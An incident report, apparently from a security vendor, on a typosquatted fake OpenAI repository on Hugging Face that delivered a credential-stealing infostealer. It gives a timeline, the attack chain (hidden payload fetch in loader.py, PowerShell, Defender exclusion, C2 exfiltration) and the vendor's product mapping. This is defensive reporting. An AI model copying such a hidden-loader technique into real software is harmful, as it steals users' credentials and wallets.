What happened
A malicious repository mimicked OpenAI's Privacy Filter, reached Hugging Face trending, and executed a credential-stealing infostealer on Windows machines that installed the model.
2026-05-07
HighMedia reportFake OpenAI repository on Hugging Face reached #1 trending with 244K downloads before delivering credential-stealing infostealer
A typosquatted OpenAI repository on Hugging Face hit 244K downloads and #1 trending before being removed, delivering a Rust-based infostealer stealing browser creds, Discord tokens, and crypto wallets.
Hugging Face (AI model platform)Credential exposureAI model supply chain attack / typosquattingDeveloper workstations and CI environments that install AI models from Hugging Face
Why it matters
244,000 downloads of confirmed infostealer malware. Stolen data: browser passwords, session tokens, Discord tokens, SSH/FTP/VPN configs, cryptocurrency wallets, and system screenshots exfiltrated to attacker C2. Connected to Mini Shai-Hulud campaign (170+ npm/PyPI packages compromised).
Missing authorization check
A Deploy Gate requiring code integrity verification before executing any downloaded AI model or dependency in a development or CI environment. Model downloads should be treated as untrusted code until verified.
Would PP block it?
PP's Deploy Gate enforces authorization before code reaches production, but it cannot verify the integrity of upstream model artifacts from third-party platforms. The missing controls are Hugging Face-side model signing, developer-side hash verification before execution, and CI policies that prohibit unapproved model sources. PP's dependency tracking features could flag untrusted model sources if integrated upstream.
Incident analysis
Timeline and technical read
Timeline
2026-05-07
HiddenLayer researchers discover Open-OSS/privacy-filter malicious repository on Hugging Face.
2026-05-07
Repository reaches #1 trending on Hugging Face with 244,000 downloads. Loader.py executes multi-stage malware chain on Windows.
2026-05-07
HiddenLayer reports to Hugging Face. Platform removes repository.
2026-05-09
Bleeping Computer publishes coverage. HiddenLayer links campaign to Mini Shai-Hulud and npm/PyPI supply chain attack involving 170+ packages.
2026-05-15
Signal detected in PP scout scan. Connected to TanStack/OpenAI Codex supply chain incident via Mini Shai-Hulud campaign infrastructure.
Technical breakdown
- The attack exploited Hugging Face's trending algorithm as a trust signal: #1 trending appeared as social proof of legitimacy, accelerating downloads.
- The loader.py file included fake AI-related code to appear harmless while silently fetching an external payload via base64-encoded URL with SSL verification disabled.
- Multi-stage execution chain: PowerShell → privilege escalation → Microsoft Defender exclusion → Rust-based infostealer (sefirah) → C2 exfiltration to recargapopular[dot]com.
- The 244,000 download count may have been artificially inflated; 667 accounts that liked the repo appear auto-generated, suggesting coordinated campaign infrastructure.
- Overlaps with Mini Shai-Hulud campaign: same infrastructure used in the TanStack npm supply chain attack that breached OpenAI Codex and exposed code-signing certificates.
Authorization boundary
Where the authorization boundary should have been
This incident is categorized as Credential exposure. The relevant Permission Protocol gate is Deploy Gate. The read is conditional: the block only applies where the real action boundary is routed through a gate.
- If enforced at
- Model download / execution boundary in developer and CI environments
- Still needs
- Third-party AI model platform integrity; Hugging Face's trending algorithm as an attack surface; Windows execution policy for downloaded Python scripts
- Receipt required for
- Execution of any downloaded AI model artifact — must have verified hash, known publisher, and approved source registry
PP governs agent tool-call authority within an organization's own systems. It does not govern Hugging Face's platform security or verify the integrity of third-party model downloads. This requires supply-chain controls (code signing, hash verification) outside PP's scope.
Start small
Put the relevant gate at this action boundary.
This incident maps to Deploy Gate. Start with the boundary that controls the actual action, then require a signed receipt before execution.